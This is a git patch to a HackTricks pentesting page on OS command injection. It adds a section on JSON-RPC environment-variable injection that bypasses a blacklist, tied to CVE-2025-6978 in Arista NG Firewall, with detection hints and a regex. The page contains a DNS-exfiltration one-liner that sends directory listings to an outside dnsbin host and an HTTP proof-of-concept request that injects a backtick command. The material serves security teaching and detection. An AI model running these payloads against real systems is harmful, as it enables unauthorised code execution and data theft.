From 55b8bc55351c7a5eb96bb5e6c3a0f249d7b5f9e7 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 5 Feb 2026 18:49:12 +0000 Subject: [PATCH] Add content from: CVE-2025-6978: Arbitrary Code Execution in the Arista NG Fir... --- src/pentesting-web/command-injection.md | 27 +++++++++++++++++++++++-- 1 file changed, 25 insertions(+), 2 deletions(-) diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index dc2b2c0b8ee..ac3986c9a51 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -104,7 +104,7 @@ Based on the tool from `https://github.com/HoLyVieR/dnsbin` also hosted at dnsbi ``` 1. Go to http://dnsbin.zhack.ca/ 2. Execute a simple 'ls' -for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done +for i in $(ls /) ; do host "${i}.3a43c7e4e57a8d0e2057.d.zhack.ca"; done ``` ``` @@ -158,6 +158,29 @@ execFile('/usr/bin/do-something', [ Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024). +### JSON-RPC env vars → shell `eval` chain (blacklist bypass) + +Some web consoles expose JSON-RPC methods that **allow-list** the main action but forward **secondary parameters as environment variables** to a shell script. A typical vulnerable flow: + +- JSON body `params[0]` selects the action (e.g., `"DNS"`) and is checked against an enum. +- `params[1]` is an object; each key/value is concatenated into `KEY=value` and passed as the `envp` argument to `Runtime.exec()` when launching a troubleshooting script. +- A weak blacklist only rejects `; & | > $(`, so **command substitution via backticks** (`` ` ``) survives. +- The script builds a `CMD` string with those environment variables and executes it with `eval`, so injected backticks are executed as root. + +Minimal PoC against such an endpoint (`/admin/JSON-RPC`, authenticated): + +```http +POST /admin/JSON-RPC HTTP/1.1 +Content-Type: application/json + +{"method":"runTroubleshooting","params":["DNS",{"HOST":"127.0.0.1`id`"}],"id":1} +``` + +Network detection hints for this pattern: +- Look for POSTs to `/admin/JSON-RPC` with `method` containing `runTroubleshooting`. +- Inspect `params[1]` object keys like `HOST` or `URL` for command-substitution metacharacters after URL/JSON decoding (case-sensitive). +- Example regex from vendor guidance: `/\x22(HOST|URL)\x22\s*:\s*\x22(?:[^\x22\\]|\\.)*?[\x60\x27\x24\x3c]/`. + ### Argument/Option injection via leading hyphen (argv, no shell metacharacters) Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell. @@ -216,7 +239,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject ## References -- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) @@ -224,5 +246,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/) +- [CVE-2025-6978 Arista NG Firewall JSON-RPC command injection](https://www.thezdi.com/blog/2026/2/4/cve-2025-6978-arbitrary-code-execution-in-the-arista-ng-firewall) {{#include ../banners/hacktricks-training.md}}